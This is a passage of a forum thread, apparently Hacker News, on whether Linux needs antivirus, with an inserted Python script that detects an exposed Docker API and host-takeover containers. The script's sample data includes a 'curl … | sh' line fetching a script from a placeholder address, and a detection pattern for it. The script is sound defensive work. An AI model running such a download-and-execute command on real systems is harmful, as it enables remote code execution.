
158 points | kenjackson | 1 comment

ExoticPearTree No.41031994
People drink the kool-aid and believe that Linux needs antivirus. So many vendors tried and failed at scaring people into buying Linux antivirus that I've lost track over the years.

My perspective is that it is a very very poor idea to have an anti-malware solution running on a Linux system. CrowdStrike is very persistent in their sales pitches and do FUD campaigns better than the competition to convince people with decision-making authority that Linux and containers and whatnot need an antivirus.

nikcub No.41033791
Recently helped somebody who accidentally left dockerd open to the internet with no auth. It was hacked, backdoored and running a crypto miner within hours. Only detected when the hosting company emailed him days later because the worm was further scanning other hosts from his machine.

How would you stop, detect and/or remove this threat from this machine on a linux server without antivirus / EDR?

Ajedi32 No.41034786
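As an added example (not code from the thread or from any commenter), here is the kind of check a Linux admin can run by hand to answer nikcub's question without an EDR agent: detect a dockerd listening on a non-loopback address (the unauthenticated Docker API on TCP 2375 is effectively remote root), and flag containers that give an intruder the host (privileged, host root or docker.sock mounted, host PID namespace, or a command that pipes a download into a shell). The input lines standing in for `ss -Htlnp` and `docker inspect` output are constructed for the example; the IP address and container name in them are placeholders, not observed indicators.

```python
import json
import re

# Constructed sample of `ss -Htlnp` output (no header row) for a host where
# dockerd was started with -H tcp://0.0.0.0:2375 and no TLS.
SS_SAMPLE = """\
LISTEN 0 4096 127.0.0.1:631 0.0.0.0:* users:(("cupsd",pid=812,fd=7))
LISTEN 0 4096 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=901,fd=3))
LISTEN 0 4096 *:2375 *:* users:(("dockerd",pid=1337,fd=9))
LISTEN 0 4096 [::1]:6010 [::]:* users:(("sshd",pid=2200,fd=10))
"""

# Constructed sample of `docker inspect $(docker ps -q)`: one legitimate
# container and one of the shape an intruder creates through the open API
# (privileged, host root mounted, bootstrap script pulled from a placeholder
# TEST-NET-2 address).
INSPECT_SAMPLE = json.dumps([
    {"Name": "/web", "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
                    "PidMode": ""}},
    {"Name": "/sysupdate", "Config": {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "curl -s http://198.51.100.7/x.sh | sh"]},
     "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"], "PidMode": "host"}},
])

LOOPBACK_PREFIXES = ("127.", "[::1]")


def exposed_listeners(ss_output, names=("dockerd",), risky_ports=(2375,)):
    """Return (process, bind_address, port) for every listener that is either a
    named daemon or on a risky port and is bound to something other than loopback.
    '*' and '0.0.0.0' mean all interfaces, i.e. reachable from the network."""
    findings = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        addr, _, port = parts[3].rpartition(":")
        if addr.startswith(LOOPBACK_PREFIXES):
            continue
        m = re.search(r'\("([^"]+)",pid=(\d+)', line)
        proc = m.group(1) if m else "?"
        if proc in names or int(port) in risky_ports:
            findings.append((proc, addr, int(port)))
    return findings


def suspicious_containers(inspect_json):
    """Return (container_name, [reasons]) for containers with host-takeover capability."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "?").lstrip("/")
        hc = c.get("HostConfig") or {}
        cfg = c.get("Config") or {}
        reasons = []
        if hc.get("Privileged"):
            reasons.append("privileged")
        for bind in hc.get("Binds") or []:
            src = bind.split(":")[0]
            if src in ("/", "/var/run/docker.sock"):
                reasons.append(f"mounts {src}")
        if hc.get("PidMode") == "host":
            reasons.append("host pid namespace")
        cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
        if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
            reasons.append("pipes download to shell")
        if reasons:
            findings.append((name, reasons))
    return findings


def report(ss_output=SS_SAMPLE, inspect_json=INSPECT_SAMPLE):
    """Human-readable summary with the manual remediation steps for each finding."""
    lines = []
    for proc, addr, port in exposed_listeners(ss_output):
        lines.append(f"EXPOSED: {proc} listening on {addr}:{port}; "
                     "restrict to the unix socket or require --tlsverify, and firewall the port")
    for name, reasons in suspicious_containers(inspect_json):
        lines.append(f"SUSPICIOUS: container {name} ({', '.join(reasons)}); "
                     "docker stop/rm it, then check the host for persistence (cron, systemd, authorized_keys)")
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

On a live host the two inputs come from `ss -Htlnp` and `docker inspect $(docker ps -q)`; the script only encodes what to look for. Removing the miner container is not the end of the cleanup: with `/` mounted into a privileged container the intruder had root on the host, so the box should be treated as fully compromised and rebuilt rather than trusted after a `docker rm`.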
Yeah, desktop Linux is more obscure and generally used by more technically inclined people, so malware is less common, but out of the box it's just as vulnerable to viruses as Windows or any other OS that runs user-installed applications with no sandbox.

If we were _really_ serious about endpoint security we'd be pushing business users towards operating systems with more modern security architectures, like Android, iOS or Chrome OS. That would be a lot of work though due to the fact that most legacy software is not compatible with those systems.